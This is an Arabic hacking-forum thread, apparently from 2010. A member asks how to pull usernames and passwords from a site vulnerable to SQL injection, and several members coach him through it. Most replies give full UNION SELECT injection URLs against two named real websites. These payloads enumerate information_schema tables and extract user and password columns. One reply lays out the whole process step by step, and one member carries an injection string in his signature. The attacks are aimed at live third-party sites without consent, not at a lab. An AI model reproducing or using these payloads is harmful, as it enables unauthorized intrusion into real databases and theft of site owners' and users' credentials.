التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-18-2010, 02:14 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






الركن المظلم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الركن المظلم is on a distinguished road

. غير مجاب: الى الاخ هون أرعص


يسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته

الا يا الغالي أنا سويت مثل ما قلت
ذهبت الى موقع مصاب وظعت علامه '
وضهر الخطأ بعدها أظفت قبل المتغير علامه -
وبعدها أظفت
-- Union Select 1,2,3,4,5
حتى وصلت الى عدد الاعمدهـ
وطلع لي بالعنوان رقم 3
أنا أبغى أطلع اليوزر والباس
تقدر تفيدني
وجزاك الله الف خير

علما اني جر بت أحط يوزر وباسبورد بالانجليزي يطلع خطا
smilies3




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC hgn hgho i,k Hvuw

   

رد مع اقتباس
قديم 07-18-2010, 09:34 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية DannY.IraQi
 

 

 
إحصائية العضو







DannY.IraQi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DannY.IraQi is on a distinguished road

افتراضي


تابع دورة الاخ فوكانو

-------------------------------


طيب جرب الامر هذا @@version

لمعرفه اصدار القاعدة ! ورد لي خبر على شان بقدر اساعدك @!

التوقيع

 

   

رد مع اقتباس
قديم 07-18-2010, 11:55 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






الركن المظلم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الركن المظلم is on a distinguished road

افتراضي


يا الغالي

أنا فهمت الطريقه
وطبقت الاوامر
لاكن المشكله
عمود الباسبورد
وعمود اليوزر
ما عم تطلع

أول شيء
http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2,3,4,5,6,7,8,9 -

بعدين طلع العمود المصاب موب بالصفحه في لب الصفحه في العنوان يعني

بعدين طلعنا عمود اليوزر طلع
cdvdcenter.com:.member:id:sidividice_cdvd

يعني id

طيب

pass عمود الباس

التطبيق راح يكون كذا
http://www.cdvdcenter.com/zcat.php?id=-1 Union Select 1,2, Concat(id,0x3a,pass),4,5+from+member --

بس ما طلع شيء
لا يوزر ولا باس

وش الحل ؟
ومشكور

   

رد مع اقتباس
قديم 07-18-2010, 12:04 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية hklv
 

 

 
إحصائية العضو






hklv غير متواجد حالياً

إرسال رسالة عبر MSN إلى hklv

 

 

إحصائية الترشيح

عدد النقاط : 10
hklv is on a distinguished road

افتراضي


الحقيقه الي طلعت عندي عدد الأعمدة 5 وليست 9 !

والعمود المصاب ما ظهر يطلع لي


The used SELECT statements have a different number of columns

لعلى وعسى أن تكون مرقعة

   

رد مع اقتباس
قديم 07-18-2010, 12:15 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو






الركن المظلم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الركن المظلم is on a distinguished road

افتراضي


صح يا الغالي 5 أعمده لاكن أنا نسختها بهدف وصول الفكرهـ

   

رد مع اقتباس
قديم 07-18-2010, 12:39 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو






الركن المظلم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الركن المظلم is on a distinguished road

افتراضي


[align=right]ركزو بذي وشوفو وش المشكله

أول شيء

http://www.arzuntarin.com/zcat.php?id=-1
^
موقع مصاب بالعمود 3
له خمس أعمده
http://www.arzuntarin.com/zcat.php?id=-1 UNION SELECT 1,2,3,4,5

أول شيء نطلع الاصدار طلع 5

بعدين
نحط الاوامر ع الرابط

كذا
http://www.arzuntarin.com/zcat.php?i...schema.columns


بعدين نحط الامر
نظيف الامر
(where+column_name+LIKE+CHAR(37, 112, 97, 115, 37

طلع لنا

.: Arzuntarin.com - user:pass:arzuntarin_new :.

طيب نطبق الامر الثاني

where+table_name = 0x75736572

طلع لنا

.: Arzuntarin.com - user:id:arzuntarin_new :.

حطينا

http://www.arzuntarin.com/zcat.php?i...ema.columns%20


في مشكله أو لا
[/align]

   

رد مع اقتباس
قديم 07-18-2010, 09:23 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


أهلا أخي الكريم بك معنا

مشكلتك بسيطة و سببها عدم التركيز كباقي أصدقائك

المهم...! راح أشرح لك المشكلة و أعطيك الحقنة الصحيحة

أنت في الأخير وضعت هكذا :

كود:
 http://www.arzuntarin.com/zcat.php?id=-1%20UNION%20SELECT%201,2,Concat%28id,0x3a,pass%29,4,5+from+information_schema.columns
و هذا خطأ كبير جدا، أنت ما حددت من وين يستخرج اليوزر والباس يعني ما حددت الجدول

يعني نسيت أن تضع FROM+xxx

مثلا في هذه الحالة نضع FROM+USER في آخر الحقنة

المهم...! الآن ! حتى لو نضع هذا سوف يظهر رقم 1 و الباس

و بالتأكيد الرقم 1 ليس اليوزر لأنه الـ ID لذلك سوف نرجع شوي في الحقنة و نضع الأمر group_concat()

و من الأمر سوف نستنتج أن إسمع عمود الـ USER هو USER

يعني الحقنة الأخيرة و التامة و النظيفة هذه هي :

كود:
 http://www.arzuntarin.com/zcat.php?id=-1%20union%20select%201,2,concat%28id,0x3a,user,0x3a,pass%29,4,5+from+user--
بالتوفيق و إن شاء الله أكون قد ساعدتك و في المرة المقبلة ركز أكثر

و بدي أعطيك نصيحة ( أعد مشاهدة الدروس من أول درس )

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

رد مع اقتباس
قديم 07-18-2010, 10:06 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


لحضه اخي الغالي لا تستعجل انت لخبط كثير كثيرر ..

الحين اشرحها لك .

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 07-18-2010, 10:11 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


اولا. شوف الرد على استفسارك هذا يمكن تعرف الخطــأ الي سويته ..

يا شباب بليز أرجو المساعده

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 07-18-2010, 10:15 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية hklv
 

 

 
إحصائية العضو






hklv غير متواجد حالياً

إرسال رسالة عبر MSN إلى hklv

 

 

إحصائية الترشيح

عدد النقاط : 10
hklv is on a distinguished road

افتراضي


يعطيكم ربي الف عافيه ،

   

رد مع اقتباس
قديم 07-18-2010, 10:31 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


نبدا.:

عدد االاعمدة المصابه .: 5

نوع اصدار قاعدة البيانات .: 5

http://www.cdvdcenter.com/zcat.php?i...on%28%29,4,5--


شوف الخطـأ طلع لك فووق في راس الصفحه في التوتيل ..


تمام ..

الان لحظ جداول الباسورد في هذا الرابط ...:


http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

member:pass:sidividice_cdvd
user:pass:sidividice_cdvd
لو تلاحط اني اضفت امر . group_ قبل كلمه ..Concat ؛ << في الحقنه ..

شوف الرابط الي فوق تبع الاستفسار الاول تبعك وبتعرف وش اقصد ..بإمر group_

لان هذا الامر بستخرج لك جميع الجداول ..


نتابع الحقنه .:

الان ناخذ من جداول الباسورد الي فوق ..ناخذ عمود user ونشفره ..بموقع .:

http://www.waraxe.us/sql-char-encoder.html

بعد التشفير بكون هيك الامر كامل في الموقع .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(table_name,0x3a,column_name,0x3a, table_schema),4,5+from+information_schema.columns+ where+table_name=0x75736572--


وهذه الاعمدة تبع اليوزر .:


user:id:sidividice_cdvd
user:user:sidividice_cdvd
user:pass:sidividice_cdvd


لاحظ في الرابط فوق تبع الحقنه يوجد امر group_ >> !! قلت لك الامر يجب في اي حقنه تستخدمه لكي تعرف الجداول ..


نكمل الان ونستخرج معلومات صاحب الموقع .:


لاحظ هنا الرابط .:

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--



سوف تجد اليوزر والباسورد تبع الموقع ..

لكن اليوزر لم يظهر لم اعرف لماذا ..

لكن اذا لم يظهر اذهب الى اعمدت الباسورد ..:

member:pass:sidividice_cdvd

وشفر كلمه
member ..

لان احنا فوق شفرنا كلمت user لكن لم يظهر اليوزر والباسورد معنا .

الان شفر كلمه memder وإن شاء الله يظهر معااك .. اليوزر والباسورد .


ملاحظــــة .:


لو تلاحظ في الرابط هذا تبعك ..:


http://www.arzuntarin.com/zcat.php?i...schema.columns


شوف خطــأ كبير عملته ياغالي ..


وهو انك جعلت امر information_schema.columns بعد كلمه from

وهكذا سوف يأتيك خطأ في الرابط ..

والصحيح هو اضافه بعد كلمت from عند استخراج اليوزر والباسورد ..

تضع بعد كلمه from الاسم الذي شفرته في موقع .:

http://www.waraxe.us/sql-char-encoder.html


شوف الرابط الصحيح هنا ..

http://www.cdvdcenter.com/zcat.php?id=-1 union select 1,2,group_Concat(user,0x3a,pass),4,5+from+user--


هكذا انا اقصد ..


إن شاء الله انك فهمتني وانا عارف انك لخبطت كثيررر وإحنا كنا مثلك نلخبط.


لكن ارجع اقولك ،، لا تستعجل في تحميل الدروس او الدورة كامله ..

في اليوم حمل درس .. وتابعه زيين زيين وطبق ...


واذا لم يضبط معك موقع [ ضعه جانبأآ في مفكره ] واستخدم موقع اخر ..

وهكذا . وإن شاء الله تحترف اخي الغالي ...


ملاحضـــة ايضــأ. :


ركز جيدأأ في الاوامر . الي بالحقن .. عشان تعرف كيف تستخرج اليوزر والباسورد.




تحياتي لك ..


اخوك .:


Dr.NaNo

بالتوفيق لك . اخي الغالي .

التوقيع

http://www.vbspiders.com/vb/t61978.html

 


التعديل الأخير تم بواسطة Dr.NaNo ; 07-18-2010 الساعة 10:36 PM.

   

رد مع اقتباس
قديم 07-18-2010, 11:59 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو






الركن المظلم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الركن المظلم is on a distinguished road

افتراضي


مشطورين وما تقصرون الشغل خطا حقي الحمد لله فهمت الفكرهـ يا حباني وربي وفيتكم وكفيتم لكم تحياتي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
موقع يعطيك معلومات عن صاحب الاي بي ...فقط ضع الاي بي rayhant قســم إختــراق الأجهــزة 179 08-22-2012 02:51 PM
الى الاخ زيرو hacker-oziwa جـــ'ابات العناكــ'ب 2 04-06-2010 04:50 PM
تثبيت الاي بي ابو نايف جـــ'ابات العناكــ'ب 0 02-10-2010 02:07 PM
[Product] : كاشف الاي بي IP الحقيقي للاعضاء (الجهاز) مع الاي بي IP الحقيقي للمستضيف (الاتصال) xman2 قســم تطويــر المــــواقع 0 09-06-2009 05:01 AM


الساعة الآن 01:22 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0